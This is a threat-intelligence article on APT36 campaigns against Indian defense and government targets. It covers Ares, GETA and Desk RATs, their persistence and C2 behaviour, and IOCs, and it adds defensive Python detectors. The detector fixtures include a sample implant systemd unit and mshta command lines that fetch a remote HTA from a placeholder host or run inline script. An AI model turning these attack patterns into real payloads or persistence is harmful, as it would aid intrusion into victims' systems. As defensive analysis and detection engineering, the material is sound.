The advanced persistent threat (APT) group known as APT36, or Transparent Tribe, has intensified its espionage operations targeting Indian defense and government entities. Recent reports from Aryaka Threat Research Labs detail the group’s use of a new arsenal of cross-platform malware, including sophisticated tools specifically designed for Linux systems, to maintain persistent access and exfiltrate sensitive data.
These campaigns use spear-phishing as the initial access vector, delivering malicious LNK shortcuts, HTA files, ELF binaries, and PPAM (PowerPoint add-in) attachments. The attackers have recently been observed staging their payloads on compromised, legitimately registered Indian domains, which lends the lures credibility and helps them past domain-reputation controls. Together these tools let APT36 compromise both Windows and Linux hosts, a significant expansion of the group's operational capability and targeting scope.
APT36 Escalates Attacks with New Linux Malware
APT36 and associated actors, including the SideCopy group, are employing a multi-pronged approach to compromise systems. Their activity over the past month, as documented by Aryaka, has concentrated on Indian strategic sectors. By hosting lures on established Indian domains, the threat actors aim to slip past security controls and gain initial access with carefully crafted phishing lures.
The malware deployed by APT36 is built for stealth and persistence: in-memory execution that leaves few traces on disk, encrypted command-and-control (C2) traffic that blends with ordinary connections, and, on Linux, persistence through systemd user services. Together these give the group long-term, low-visibility access to compromised networks.
The Linux chain starts with a UPX-packed, Go-based ELF downloader. On execution it creates the directory ~/.local (hidden by its leading dot) to stage its payload, then fetches three files from the compromised domain innlive.in: gkt3.1, a PyInstaller-packed ELF build of the Ares RAT; gkt3.sh, a shell script that installs a systemd user service for persistence; and a decoy PDF to give the victim something plausible to look at.
The systemd user service launches gkt3.1, the Ares RAT, whenever the user's systemd instance starts, that is, at each login. The implant therefore comes back after a reboot without any further action from the attacker.
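A practical check for the persistence described above is to audit the unit files under ~/.config/systemd/user (and /etc/systemd/user) for services that execute from user-writable or hidden locations. The following is an added example written for this page, not Aryaka's tooling or the actual contents of gkt3.sh; the two unit texts are constructed, and the implant unit only mirrors the reported layout (a binary dropped directly under ~/.local, started at login).

```python
import configparser
from pathlib import PurePosixPath
from typing import Dict, List, Optional

# World- or user-writable staging locations that a legitimate user service
# almost never executes from.
SCRATCH_ROOTS = ("/tmp", "/var/tmp", "/dev/shm")
# Conventional homes for user-installed tools (pipx, cargo, ...); not flagged alone.
ALLOWED_HOME_BIN = ("bin", ".local/bin", ".cargo/bin")

# Constructed sample units (hypothetical content, not recovered from the campaign).
BENIGN_UNIT = """[Unit]
Description=Syncthing - Open Source Continuous File Synchronization

[Service]
ExecStart=/usr/bin/syncthing serve --no-browser
Restart=on-failure

[Install]
WantedBy=default.target
"""

IMPLANT_UNIT = """[Unit]
Description=System Update Helper

[Service]
ExecStart=%h/.local/gkt3.1
Restart=always
RestartSec=10

[Install]
WantedBy=default.target
"""


def parse_unit(text: str) -> configparser.ConfigParser:
    """Parse a systemd unit. The format is INI-like; keys are case-sensitive and
    may repeat, so keep case and disable interpolation and strict duplicate checks."""
    cp = configparser.ConfigParser(strict=False, interpolation=None,
                                   allow_no_value=True, delimiters=("=",))
    cp.optionxform = str  # keep 'ExecStart' exactly as written
    cp.read_string(text)
    return cp


def exec_path(unit: configparser.ConfigParser, home: str) -> Optional[str]:
    """Program path from ExecStart=, with systemd's prefix characters
    ('-', '@', ':', '+', '!') stripped and the %h (home) specifier expanded."""
    cmd = unit.get("Service", "ExecStart", fallback="").strip()
    if not cmd:
        return None
    return cmd.split()[0].lstrip("-@:+!").replace("%h", home)


def audit_unit(name: str, text: str, home: str) -> List[str]:
    """Reasons this user unit looks like a persistence implant (empty if none)."""
    unit = parse_unit(text)
    prog = exec_path(unit, home)
    if prog is None:
        return [f"{name}: no ExecStart"]
    reasons: List[str] = []
    parent = PurePosixPath(prog).parent
    if any(prog.startswith(root + "/") for root in SCRATCH_ROOTS):
        reasons.append(f"{name}: executes from scratch directory {parent}")
    elif prog.startswith(home + "/"):
        rel = PurePosixPath(prog[len(home) + 1:])
        if not any(str(rel).startswith(ok + "/") for ok in ALLOWED_HOME_BIN):
            reasons.append(f"{name}: executes from user-writable path {parent}")
            if any(part.startswith(".") for part in rel.parent.parts):
                reasons.append(f"{name}: program hidden under a dot-directory")
    # A suspicious program wired to default.target comes back on every login.
    if reasons and "default.target" in unit.get("Install", "WantedBy", fallback=""):
        restart = unit.get("Service", "Restart", fallback="no")
        reasons.append(f"{name}: re-launched on every login (Restart={restart})")
    return reasons


def scan_units(units: Dict[str, str], home: str) -> Dict[str, List[str]]:
    """Audit a mapping of unit name -> unit text and return only the flagged ones."""
    results = {name: audit_unit(name, text, home) for name, text in units.items()}
    return {name: why for name, why in results.items() if why}


if __name__ == "__main__":
    sample = {"syncthing.service": BENIGN_UNIT, "update-helper.service": IMPLANT_UNIT}
    for unit_name, why in scan_units(sample, "/home/analyst").items():
        print(unit_name, "->", "; ".join(why))
```

On a live host, feed `scan_units` the contents of `~/.config/systemd/user/*.service` with `home` set from `os.path.expanduser("~")`. One caveat: an `ExecStart=/bin/sh -c ...` or `/usr/bin/env python3 ...` line hides the real target behind a system interpreter, so extend `exec_path` to inspect the arguments of such interpreters before trusting a clean result.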
Ares RAT: A Deep Dive into Linux Espionage Tool
The Ares RAT, written in Python, is the core of the Linux attacks. On start-up it collects basic system information (platform, hostname and username) and generates a unique identifier for the victim machine. A function called listall() then walks the user's home directory recursively, enumerating files and directories; the listing is written to /tmp/list.txt and uploaded to the C2 server in a multipart HTTP request.
The RAT's main loop polls the C2's `/hello` endpoint at a fixed interval for tasking. Supported commands include changing the working directory (`cd`), uploading and downloading files, capturing screenshots, executing arbitrary Python code, installing additional persistence, and exiting.
Parallel Windows Attacks and Evolving Malware
In parallel, APT36 continues to target Windows with a different but comparably capable toolset. These campaigns typically begin with an LNK shortcut that launches mshta.exe, a legitimate Windows utility, which fetches JavaScript from a compromised website such as sifi.co.in. The script triggers XAML deserialization and in-memory .NET deserialization, loading and executing the next stage without ever writing it to disk.
This chain deploys the GETA RAT, a .NET implant. GETA RAT talks to its C2 over TCP (port 8621 was observed) with AES-encrypted traffic, sending beacons and heartbeats at randomized intervals of roughly 30 to 60 seconds. It supports process termination (`pkill`), shell access, file operations, and remote desktop. For persistence it uses the Startup folder and registry Run keys, and it checks for security products such as Kaspersky and Quick Heal in order to evade them.
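The LNK-to-mshta step above is the part of the Windows chain that endpoint telemetry sees most clearly: a signed Microsoft binary started with a remote URL or an inline script handler on its command line. The following detection logic is an added example written for this page, not a rule from Aryaka's report; the process-creation records are constructed in a Sysmon-style key=value layout, and the host name compromised.example is a placeholder.

```python
import ntpath
import re
from typing import Dict, List, Optional

# Constructed process-creation records (hypothetical, not telemetry from the
# reported intrusion). Fields mirror Sysmon Event ID 1 names.
SAMPLE_EVENTS = [
    r'ProcessId=4120 Image="C:\Windows\explorer.exe" CommandLine="C:\Windows\explorer.exe" '
    r'ParentImage="C:\Windows\System32\userinit.exe"',
    # Double-clicked LNK: explorer launches mshta with a remote HTA/JS payload.
    r'ProcessId=5312 Image="C:\Windows\System32\mshta.exe" '
    r'CommandLine="mshta.exe https://compromised.example/docs/Notice.hta" '
    r'ParentImage="C:\Windows\explorer.exe"',
    # Inline script handler, no file on disk at all, spawned from Office.
    r'''ProcessId=5400 Image="C:\Windows\System32\mshta.exe" '''
    r'''CommandLine="mshta.exe javascript:close(new ActiveXObject('WScript.Shell').Run('calc.exe'))" '''
    r'''ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"''',
    # Vendor installer running a local HTA: legitimate, not matched by these rules.
    r'ProcessId=5500 Image="C:\Windows\System32\mshta.exe" '
    r'CommandLine="mshta.exe C:\Program Files\Vendor\setup.hta" '
    r'ParentImage="C:\Program Files\Vendor\setup.exe"',
    # A browser with a URL is not mshta.
    r'ProcessId=6001 Image="C:\Program Files\Google\Chrome\Application\chrome.exe" '
    r'CommandLine="chrome.exe https://example.com" ParentImage="C:\Windows\explorer.exe"',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Remote payload: an http(s)/ftp URL or a UNC path on the command line.
REMOTE_RE = re.compile(r'(?:https?|ftp)://[^\s"\']+|\\\\[^\s"\']+', re.IGNORECASE)
# Script-in-argument: mshta will run these without any .hta file.
INLINE_RE = re.compile(r'\b(?:javascript|vbscript|about):', re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value record into a dict, dropping the surrounding quotes."""
    return {key: value.strip('"') for key, value in FIELD_RE.findall(line)}


def check_mshta(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding when mshta.exe is launched with a remote or inline payload."""
    if ntpath.basename(event.get("Image", "")).lower() != "mshta.exe":
        return None
    cmd = event.get("CommandLine", "")
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    base = {"pid": event.get("ProcessId", "?"), "parent": parent}
    remote = REMOTE_RE.search(cmd)
    if remote:
        return {**base, "rule": "mshta_remote_payload", "payload": remote.group(0)}
    if INLINE_RE.search(cmd):
        return {**base, "rule": "mshta_inline_script", "payload": cmd}
    return None


def hunt(lines: List[str]) -> List[Dict[str, str]]:
    """Run the check over a batch of records and keep the hits."""
    hits = []
    for line in lines:
        hit = check_mshta(parse_event(line))
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"[{hit['rule']}] pid={hit['pid']} parent={hit['parent']} payload={hit['payload']}")
```

The parent image is kept in every finding because it is what separates the phishing case (explorer.exe or an Office process as parent) from an installer that legitimately runs a local HTA; a real rule would escalate on that field rather than on the URL alone.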
A further Windows component is the Desk RAT, delivered through PPAM lures such as a fake “Project Vijayak BRO Updates” file. The lure's VBA macros run automatically and download ZIP archives from domains like defenceindia.siteteamindia; the RAT itself is written in Go. It collects CPU and memory utilization and system uptime, and persists through a registry Run key whose target lives under %TEMP%. To learn the host's IP address it either queries ipify.org or connects a UDP socket to 8.8.8.8:80 and reads the socket's local address, a common Go idiom that actually yields the outbound interface address rather than the public IP (no packet needs to be sent for it to work). It then enriches the address with geolocation data from ip-api.com.
The Desk RAT communicates over WebSockets on the `/ws` endpoint, completing a standard RFC 6455 handshake and then sending client information and heartbeats carrying system telemetry roughly every 30 seconds. Commands received on the channel include browsing files and executing uploaded files.
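Because the Desk RAT's channel is a standards-compliant WebSocket, an analyst can confirm from a capture whether a suspicious `/ws` upgrade was actually completed and then decode the masked client frames that carry the telemetry. The code below is an added example written for this page, not Aryaka's or the malware's code: the Sec-WebSocket-Accept computation and the masking scheme are exactly as RFC 6455 specifies, while the handshake text, the host c2.example and the heartbeat JSON are constructed placeholders (the key and mask values are the ones used in the RFC's own examples).

```python
import base64
import hashlib
import json
from typing import Dict, Optional, Tuple

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed by RFC 6455, section 1.3

# Constructed handshake (hypothetical host/path layout, RFC 6455 example key).
CLIENT_REQUEST = (
    "GET /ws HTTP/1.1\r\n"
    "Host: c2.example\r\n"
    "Upgrade: websocket\r\n"
    "Connection: Upgrade\r\n"
    "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
    "Sec-WebSocket-Version: 13\r\n\r\n"
)
SERVER_RESPONSE = (
    "HTTP/1.1 101 Switching Protocols\r\n"
    "Upgrade: websocket\r\n"
    "Connection: Upgrade\r\n"
    "Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=\r\n\r\n"
)
# Constructed heartbeat body; field names are illustrative, not the RAT's schema.
HEARTBEAT = json.dumps({"type": "heartbeat", "cpu": 12.5, "mem": 41.0, "uptime_s": 86400})


def websocket_accept(client_key: str) -> str:
    """Sec-WebSocket-Accept = base64(SHA-1(key + GUID)), per RFC 6455."""
    digest = hashlib.sha1((client_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def parse_http_head(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a request or response head into its start line and lower-cased headers."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def is_upgrade_request(raw: str) -> bool:
    """True when the request asks to switch the connection to WebSocket."""
    _start, h = parse_http_head(raw)
    return (h.get("upgrade", "").lower() == "websocket"
            and "upgrade" in h.get("connection", "").lower()
            and "sec-websocket-key" in h)


def verify_handshake(request: str, response: str) -> Optional[str]:
    """Return the upgraded path if the server completed a valid handshake, else None."""
    if not is_upgrade_request(request):
        return None
    start, req_h = parse_http_head(request)
    status, resp_h = parse_http_head(response)
    if not status.startswith("HTTP/1.1 101"):
        return None
    if resp_h.get("sec-websocket-accept") != websocket_accept(req_h["sec-websocket-key"]):
        return None
    return start.split()[1]


def encode_client_frame(payload: bytes, mask: bytes, opcode: int = 0x1) -> bytes:
    """Build a single masked client->server frame (payload under 126 bytes)."""
    if len(payload) >= 126 or len(mask) != 4:
        raise ValueError("only short payloads with a 4-byte mask are handled here")
    header = bytes([0x80 | opcode, 0x80 | len(payload)])  # FIN set, MASK bit set
    return header + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(payload))


def decode_client_frame(frame: bytes) -> Tuple[int, bytes]:
    """Unmask one client->server frame; RFC 6455 requires client frames to be masked."""
    opcode = frame[0] & 0x0F
    if not frame[1] & 0x80:
        raise ValueError("client frame is not masked")
    length = frame[1] & 0x7F
    if length >= 126:
        raise ValueError("extended payload lengths not handled here")
    mask = frame[2:6]
    payload = bytes(b ^ mask[i % 4] for i, b in enumerate(frame[6:6 + length]))
    return opcode, payload


if __name__ == "__main__":
    print("upgraded path:", verify_handshake(CLIENT_REQUEST, SERVER_RESPONSE))
    frame = encode_client_frame(HEARTBEAT.encode(), b"\x37\xfa\x21\x3d")
    opcode, body = decode_client_frame(frame)
    print("opcode", opcode, "payload", body.decode())
```

`verify_handshake` is the piece to wire into proxy or IDS logic for the "unexpected WebSocket upgrades" check: an upgrade to `/ws` on a host outside the allow-list that actually completes (status 101 with the correct accept value) is the signal, whereas an upgrade attempt the server rejects is noise.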
Technical analysis also yields concrete timing and beaconing patterns. The Linux droppers use fixed timing intervals, and the Ares RAT uploads to its `/report` endpoint on a predictable schedule. GETA RAT screenshots arrive in packets spaced roughly 0.24 seconds apart, and its encrypted commands have a fixed 16-byte length (a single AES block). Details of this kind, provided by Aryaka Threat Research Labs, are what detection engineers and incident responders need in order to write rules.
Indicators of compromise (IOCs) include the IP addresses 65.109.190.120 and 2.56.10.86 and file hashes such as the MD5 d33ad6ed76cdd0b036af466d69a6ff50 for the Desk RAT. Organizations are advised to block the compromised domains innlive.in and sifi.co.in, and to monitor for suspicious `mshta.exe` execution, unexpected systemd service installations, and unexpected WebSocket upgrades.
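The timing observations above (the Ares RAT's fixed-interval `/hello` polling and `/report` uploads, and GETA RAT's 30-to-60-second randomized heartbeats) are the raw material for a beaconing detector, which is the kind of IDS/IPS anomaly rule recommended below. The following is an added example written for this page, not Aryaka's detection content: it groups proxy log entries per client, server and path, measures the gaps between requests, and separates timer-driven cadences from human browsing. The log lines are constructed, and c2.example, 198.51.100.9 and news.example are placeholders rather than campaign infrastructure.

```python
import statistics
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed proxy log, one request per line: "epoch client server method path".
#   10.0.0.5 -> c2.example    GET /hello every 60 s and POST /report every 300 s
#   10.0.0.7 -> 198.51.100.9  POST /beacon with a 30-60 s randomised sleep
#   10.0.0.5 -> news.example  ordinary browsing, irregular gaps
SAMPLE_LOG = """\
1000 10.0.0.5 c2.example GET /hello
1000 10.0.0.5 c2.example POST /report
1005 10.0.0.5 news.example GET /index.html
1007 10.0.0.5 news.example GET /style.css
1060 10.0.0.5 c2.example GET /hello
1120 10.0.0.5 c2.example GET /hello
1180 10.0.0.5 c2.example GET /hello
1240 10.0.0.5 c2.example GET /hello
1300 10.0.0.5 c2.example GET /hello
1300 10.0.0.5 c2.example POST /report
1500 10.0.0.5 news.example GET /article
1600 10.0.0.5 c2.example POST /report
1900 10.0.0.5 c2.example POST /report
2000 10.0.0.7 198.51.100.9 POST /beacon
2042 10.0.0.7 198.51.100.9 POST /beacon
2095 10.0.0.7 198.51.100.9 POST /beacon
2131 10.0.0.7 198.51.100.9 POST /beacon
2190 10.0.0.7 198.51.100.9 POST /beacon
2200 10.0.0.5 c2.example POST /report
2223 10.0.0.7 198.51.100.9 POST /beacon
3600 10.0.0.5 news.example GET /
"""

Key = Tuple[str, str, str]  # (client, server, path)


def group_timestamps(log: str) -> Dict[Key, List[int]]:
    """Collect sorted request times per (client, server, path)."""
    series: Dict[Key, List[int]] = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, client, server, _method, path = line.split()
        series[(client, server, path)].append(int(ts))
    for times in series.values():
        times.sort()
    return dict(series)


def classify(deltas: List[int], fixed_cv: float = 0.05, max_ratio: float = 2.5) -> Optional[str]:
    """'fixed' when the gaps barely vary (a timer-driven poll), 'jittered' when
    they vary but stay inside a narrow band (a randomised sleep such as 30-60 s),
    None when the spread looks like human activity."""
    mean = statistics.mean(deltas)
    if mean <= 0:
        return None
    if statistics.pstdev(deltas) / mean <= fixed_cv:
        return "fixed"
    if max(deltas) / min(deltas) <= max_ratio:
        return "jittered"
    return None


def find_beacons(log: str, min_events: int = 5) -> Dict[Key, Dict[str, object]]:
    """Return every (client, server, path) series whose cadence looks machine-driven."""
    found: Dict[Key, Dict[str, object]] = {}
    for key, times in group_timestamps(log).items():
        if len(times) < min_events:
            continue
        deltas = [later - earlier for earlier, later in zip(times, times[1:])]
        if min(deltas) <= 0:
            continue  # a burst within the same second is not a cadence
        kind = classify(deltas)
        if kind:
            found[key] = {"kind": kind, "events": len(times),
                          "mean_s": round(statistics.mean(deltas), 1),
                          "min_s": min(deltas), "max_s": max(deltas)}
    return found


if __name__ == "__main__":
    for (client, server, path), info in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {server}{path}: {info['kind']} cadence, "
              f"{info['events']} events, mean {info['mean_s']} s "
              f"(range {info['min_s']}-{info['max_s']} s)")
```

The two thresholds map onto the two families on this page: a coefficient of variation near zero catches the Linux dropper and Ares schedules, while the bounded max/min ratio catches GETA-style jitter, whose 30-to-60-second window has a ratio of 2. Path-level grouping keeps `/hello` and `/report` as separate series; for encrypted TCP channels with no path, group on the 4-tuple instead.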
Effective defense strategies include employing DNS and Secure Web Gateway (SWG) solutions to mitigate phishing attempts, and utilizing Intrusion Detection/Prevention Systems (IDS/IPS) to identify beaconing traffic and anomalies in encrypted C2 communications. Aryaka recommends a Unified SASE (Secure Access Service Edge) approach, incorporating Next-Generation Firewall (NGFW) capabilities, antivirus, and deep traffic inspection to significantly reduce attacker dwell time within compromised networks.
The ongoing evolution of APT36’s toolkit, particularly the expansion to cross-platform malware like the Ares RAT for Linux, signals a more sophisticated and broader threat landscape. Organizations within the defense and government sectors should remain vigilant and continuously update their security postures to counter these persistent and adapting threats.

